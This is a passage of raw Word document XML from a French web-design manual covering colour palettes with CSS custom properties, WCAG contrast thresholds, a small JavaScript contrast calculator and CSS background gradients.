            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cohérence du projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nécessite une convention</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ESPACE COLORIMÉTRIQUE PERCEPTUEL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Modèle où une variation numérique correspond à une variation visuelle constante. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>oklch()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> permet de générer des palettes régulières.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.2 Construire une palette</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une palette se compose de rôles, pas de couleurs. On définit d'abord la couleur primaire, puis les neutres, puis les couleurs d'état. Chaque rôle reçoit des variantes de luminosité pour les états et les surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f16.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.16 — Les cinq familles d'une palette</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une palette nommée par rôle et par intensité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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /* Primaire */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire-900: #0b2138;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire-700: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire-500: #274b6d;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire-100: #e8edf1;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Neutres */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --neutre-900: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --neutre-600: #5b6770;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --neutre-300: #c9d6e2;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --neutre-100: #f4f7f9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --blanc: #ffffff;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* États */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --succes: #2f7d5b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --alerte: #a63a32;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --info: #274b6d;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --accent: #e0a21b;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nommer les nuances par un nombre (100 à 900) facilite les substitutions : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--primaire-700</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut changer de teinte sans que le nom devienne faux.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>TROIS COULEURS SUFFISENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une couleur de marque, un accent et une échelle de neutres couvrent la majorité des interfaces. Multiplier les couleurs dilue la hiérarchie et complique la maintenance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.3 Contraste : la contrainte mesurable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le contraste se calcule à partir de la luminance relative des deux couleurs. Le rapport va de 1:1 (aucun contraste) à 21:1 (noir sur blanc). Les règles WCAG AA fixent des seuils selon la taille du texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.42 — Seuils de contraste WCAG</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459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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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AA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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AAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4599"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4,5:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="459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Grand texte (≥ 24 px ou 18,66 px gras)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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3:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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4,5:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4599"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Composants d'interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="459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Indicateur de focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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3:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4599"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Graphiques informatifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Calculer un contraste sans outil externe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Vérification rapide du contraste en JavaScript */</w:t>
        <w:br/>
        <w:t>function luminance(hex) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const [r, g, b] = hex.match(/\w\w/g).map(h =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const v = parseInt(h, 16) / 255;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return v &lt;= 0.03928 ? v / 12.92 : ((v + 0.055) / 1.055) ** 2.4;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return 0.2126 * r + 0.7152 * g + 0.0722 * b;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>function contraste(a, b) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const [l1, l2] = [luminance(a), luminance(b)].sort((x, y) =&gt; y - x);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return ((l1 + 0.05) / (l2 + 0.05)).toFixed(2);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>contraste("1f2933", "ffffff"); // "14.36"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un gris moyen sur blanc est le piège classique : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#fff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> atteint 4,48:1, juste sous le seuil. Le même gris sur un fond légèrement teinté passe sous 4:1. Testez toujours les combinaisons réelles, pas les couleurs théoriques.</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LE CONTRASTE NE SUFFIT PAS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un texte blanc sur fond bleu peut respecter 4,5:1 et rester pénible pour les personnes astigmates. Évitez le blanc pur sur fond saturé et préférez un blanc cassé (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#f4f7f9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>) sur un bleu très foncé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.4 Arrière-plans et dégradés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une couleur de fond peut être unie, dégradée, répétée ou multiple. Les dégradés CSS sont des images générées : ils s'animent, se superposent et s'adaptent à la taille de l'élément.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois arrière-plans composés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.bandeau {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: linear-gradient(135deg, #0f2e4c, #274b6d);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #fff;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.hero {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    linear-gradient(to top, rgb(15 46 76 / .85), rgb(15 46 76 / .2)),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    url("images/atelier.webp") center / cover no-repeat;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.motif {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-image: radial-gradient(#c9d6e2 1px, transparent 1px);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background-size: 16px 16px;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.43 — Six propriétés d'arrière-plan</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3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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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338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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>background-color</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur de fond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#f4f7f9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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background-image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Image ou dégradé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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linear-gradient(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
